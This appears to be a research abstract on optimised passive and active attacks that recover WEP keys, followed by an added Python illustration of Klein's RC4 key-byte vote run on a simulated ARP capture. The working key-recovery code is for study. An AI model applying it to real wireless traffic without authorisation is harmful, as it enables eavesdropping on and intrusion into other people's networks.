Smashing WEP in a Passive Attack

In this paper, we report extremely fast and optimised active and passive attacks against WEP, the original IEEE 802.11 wireless security protocol. The attacks result from extensive theoretical and experimental analysis (of captured WiFi packets) and from the refinement and optimisation of all previously known attacks and methodologies against the RC4 stream cipher in WEP mode. We support all our claims with an implementation of the attack, released as a publicly available patch for Aircrack-ng, whose success probability our new attacks improve drastically. We adapt our theoretical analysis from Eurocrypt 2011 to real-world scenarios, with a slight adjustment to match the empirical observations. Our active attack, based on ARP injection, requires \(22\,500\) packets to reach a success probability of \(50\,\%\) against a \(104\)-bit WEP key, using Aircrack-ng in non-interactive mode, and runs in less than \(5\) s on an off-the-shelf PC; with the same number of packets, Aircrack-ng itself succeeds only around \(3\,\%\) of the time. We also describe very fast passive-only attacks that merely eavesdrop on TCP/IPv4 packets in a WiFi session. Our passive attack requires \(27\,500\) packets, far fewer than the roughly \(37\,500\) packets Aircrack-ng needs even in active mode, which is a substantial improvement. We believe that our analysis brings further insight into the security of RC4.
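The mechanism behind every attack the abstract mentions is a statistical vote on the RC4 key bytes, driven by known plaintext: WEP uses IV || root key as the RC4 key, so the first three key bytes are public, and the first bytes of an ARP frame (LLC/SNAP header, then the fixed ARP fields) are predictable, which hands the attacker the first keystream bytes of every packet. The following Python is an added illustration of that vote, not code from the paper or from Aircrack-ng: it builds a constructed capture of ARP frames under a constructed 104-bit key and runs Klein's correlation, \(K[i] = S_i^{-1}[i - X_{i-1}] - j_i - S_i[i]\) with probability about \(1.36/256\), byte by byte. The sequential recovery here is the basic Klein attack, which is weaker than the PTW key-sum method in Aircrack-ng and than the paper's refinements; the key, IVs and packet counts are assumptions for the demonstration.

```python
import random

# Constructed sample data (not from the paper): a 104-bit WEP root key and the
# 15 plaintext bytes that start every ARP frame: LLC/SNAP header with the ARP
# ethertype, then the fixed ARP fields up to the high byte of the opcode.
ROOT_KEY = bytes.fromhex("0b1e5c0ffee4b1f0ddc0de1234")
KNOWN_PLAINTEXT = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06,
                         0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00])


def rc4_ksa(key, steps=256):
    """RC4 key scheduling. With steps < 256 it stops early and returns (S_i, j_i)."""
    S = list(range(256))
    j = 0
    klen = len(key)
    for i in range(steps):
        j = (j + S[i] + key[i % klen]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """First n output bytes X_0 .. X_{n-1} of RC4 under key."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def simulate_wep_capture(root_key, n_packets, seed=0):
    """Constructed capture: (IV, ciphertext prefix) of n ARP frames, each encrypted
    with RC4 under the per-packet key IV || root_key, as WEP does."""
    rng = random.Random(seed)
    capture = []
    for _ in range(n_packets):
        iv = bytes(rng.randrange(256) for _ in range(3))
        ks = rc4_keystream(iv + root_key, len(KNOWN_PLAINTEXT))
        capture.append((iv, bytes(p ^ k for p, k in zip(KNOWN_PLAINTEXT, ks))))
    return capture


def keystreams(capture):
    """Attacker step 1: XOR each ciphertext prefix with the known plaintext."""
    return [(iv, bytes(c ^ p for c, p in zip(ct, KNOWN_PLAINTEXT))) for iv, ct in capture]


def klein_votes(streams, prefix):
    """Attacker step 2: vote for K[i], i = 3 + len(prefix), assuming K[3..i-1] = prefix.
    Klein: X_{i-1} = i - S_i[j_{i+1}] with probability about 1.36/256, and the KSA
    gives j_{i+1} = j_i + S_i[i] + K[i], so K[i] = S_i^{-1}[i - X_{i-1}] - j_i - S_i[i]."""
    i = 3 + len(prefix)
    votes = [0] * 256
    for iv, x in streams:
        S, j = rc4_ksa(iv + prefix, i)   # the first i KSA steps need only IV and the known prefix
        votes[(S.index((i - x[i - 1]) & 0xFF) - j - S[i]) & 0xFF] += 1
    return votes


def recover_key(streams, key_len=13):
    """Sequential Klein attack: take the most-voted candidate, byte by byte."""
    prefix = b""
    for _ in range(key_len):
        votes = klein_votes(streams, prefix)
        prefix += bytes([max(range(256), key=votes.__getitem__)])
    return prefix


def klein_bias(streams, root_key):
    """Diagnostic: Pr[vote == K[i]] averaged over i = 3..15 using the true prefix,
    scaled by 256 (1.0 means no bias; Klein predicts about 1.36)."""
    hits = 0
    for k, kb in enumerate(root_key):
        hits += klein_votes(streams, root_key[:k])[kb]
    return 256 * hits / (len(streams) * len(root_key))


if __name__ == "__main__":
    streams = keystreams(simulate_wep_capture(ROOT_KEY, 60000, seed=1))
    print("Klein bias x256:", round(klein_bias(streams, ROOT_KEY), 3))
    guess = recover_key(streams)
    print("recovered:", guess.hex(), "correct bytes:",
          sum(a == b for a, b in zip(guess, ROOT_KEY)))
```

Two points the numbers in the abstract depend on are visible here. First, the vote is only a 1.36/256 versus 1/256 signal, so the packet count, not the CPU time, is what decides success: a wrong decision on one byte poisons every later vote in the sequential version, which is why Aircrack-ng's PTW method votes on sums of key bytes and why the paper's refinements aim at squeezing more out of each captured packet. Second, the attack needs nothing from the packet but the IV and a known plaintext prefix, which is why eavesdropping TCP/IPv4 traffic with predictable headers suffices for a passive-only variant once the correlations are strong enough.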
